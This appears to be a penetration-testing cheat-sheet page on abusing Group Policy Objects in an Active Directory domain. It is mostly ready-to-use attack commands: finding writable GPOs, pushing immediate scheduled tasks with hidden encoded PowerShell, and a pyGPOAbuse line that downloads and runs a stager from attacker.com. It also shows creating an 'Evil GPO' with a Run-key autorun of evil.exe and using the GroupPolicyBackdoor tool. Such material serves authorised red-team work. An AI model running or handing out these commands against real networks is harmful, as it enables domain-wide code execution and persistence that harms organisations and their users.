GPO Abuse

Group Policy Objects

Force GPO update on all domain computers:

PS > Get-ADComputer -Filter * | % {Invoke-GPUpdate -Computer $_.name -Force -RandomDelayInMinutes 0}

Hunt for GPOs

List all GPOs in the domain:

PS > .\SharpView.exe Get-DomainGPO -Properties displayName

List GPOs applied to a specifiec domain user or computer:

PS > .\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName
PS > .\SharpView.exe Get-DomainGPO -ComputerIdentity WS01 -Properties DisplayName
Or
Cmd > gpresult /r /user snovvcrash [/h gpos-snovvcrash.html]
Cmd > gpresult /r /s WS01 [/h gpos-ws01.html]

Search for writable GPOs for the Domain Users security group:

PV3 > Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "Domain Users" | select objectSid).objectSid)}
PV3 > Get-DomainGPO '{<GPO_GUID>}'
Or
PS > Get-GPO -Guid <GPO_GUID>

Permissions Abuse

Recon

Show all GPOs in the domain:

PV3 > Get-NetGPO -Domain megacorp.local | select cn,displayname

Search for GPOs that are controlled by the MEGACORP\PolicyAdmins group:

PV3 > Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "MEGACORP\PolicyAdmins"}

List computers that are affected by vulnerable (modifiable) GPO:

PV3 > Get-NetOU -GUID "00ff00ff-00ff-00ff-00ff-00ff00ff00ff" | % {Get-NetComputer -ADsPath $_}

Note: if I list all OUs affected by this GPO with PowerView, there will be no domain shown (like in BloodHound), but in Group Policy Manager we can see that it is presented.

Check if computer settings are enabled for this GPO (and enable them if not):

https://gist.github.com/snovvcrash/ecdc639b061fe787617d8d92d8549801

PS > Get-Gpo VULN.GPO.NAME
PS > Set-GpoStatus VULN.GPO.NAME -Status AllSettingsEnabled

List users that can create a GPO and link it to a specific OU:

PV3 > Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=megacorp,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | select objectDN,securityIdentifier | fl
PV3 > Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select objectDN,securityIdentifier | fl

Immediate Scheduled Tasks

GPOImmediateTask

PowerView3.ps1 (New-GPOImmediateTask)

Create a task with a PowerShell payload:

$ echo 'sc -path "c:\\windows\\temp\\poc.txt" -value "GPO Abuse PoC..."' | iconv -t UTF-16LE | base64 -w0; echo
cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=
PS > New-GPOImmediateTask -TaskName Pentest -GPODisplayName VULN.GPO.NAME -CommandArguments '-NoP -NonI -W Hidden -Enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=' -Force

Clean up:

PS > New-GPOImmediateTask -GPODisplayName VULN.GPO.NAME -Remove -Force

Check when GP was last applied:

Cmd > GPRESULT /R

GPOwned + pyGPOAbuse

Get target GPO ID:

$ python3 GPOwned.py -u snovvcrash -p 'Passw0rd!' -d megacorp.local -dc-ip 192.168.1.11 -gpcmachine -listgpo

Create an immediate scheduled task:

$ python3 pygpoabuse.py megacorp.local/snovvcrash:'Passw0rd!' -gpo-id <GPO_ID> -dc-ip 192.168.1.11 -v -command -powershell '(New-Object Net.WebClient).DownloadFile("https://attacker.com/stager.exe", "C:\Windows\Temp\stager.exe"); if ($?) {C:\Windows\Temp\stager.exe}'

GPPrefRegistryValue

Check if GPMC is installed and if it's not, install it as a Windows Feature (requires elevation):

PS > Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
PS > Install-WindowsFeature –Name GPMC

Create an evil GPO and link it to the target OU (will be visible in the management console):

PS > New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=megacorp,DC=local"

Locate a writable network share:

PV3 > Find-DomainShare -CheckShareAccess

Prepare your payload, put it to the network share and create an autorun value in the evil GPO to run the payload on boot/logon:

PS > Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min /c \\srv01\SoftwareShare\evil.exe" -Type ExpandString

WMI Filters

https://rastamouse.me/ous-and-gpos-and-wmi-filters-oh-my/

GPO Abuse via NTLM Relay

Tools

GroupPolicyBackdoor

https://github.com/synacktiv/GroupPolicyBackdoor

Install:

$ git clone https://github.com/synacktiv/GroupPolicyBackdoor && cd GroupPolicyBackdoor
$ python -m venv venv && source ./venv/bin/activate
$ pip install -r requirements.txt

Basic usage:

$ python gpb.py gpo enum -d megacorp.local --dc DC01.megacorp.local -k --gpo-name VulnGPO [--ldaps] [-v]
$ python gpb.py gpo inject -d megacorp.local --dc DC01.megacorp.local -k --module modules_templates/ImmediateTask_create.ini --gpo-name VulnGPO [--ldaps] [-v]
$ python gpb.py gpo clean -d megacorp.local --dc DC01.megacorp.local -k --state-folder state_folders/1970_01_01_000000 [--ldaps] [-v]

Last updated 5 months ago

hashtagHunt for GPOs

hashtagPermissions Abuse

hashtagRecon

hashtagImmediate Scheduled Tasks

hashtagGPOImmediateTask

hashtagGPOwned + pyGPOAbuse

hashtagGPPrefRegistryValue

hashtagWMI Filters

hashtagGPO Abuse via NTLM Relay

hashtagTools

hashtagGroupPolicyBackdoor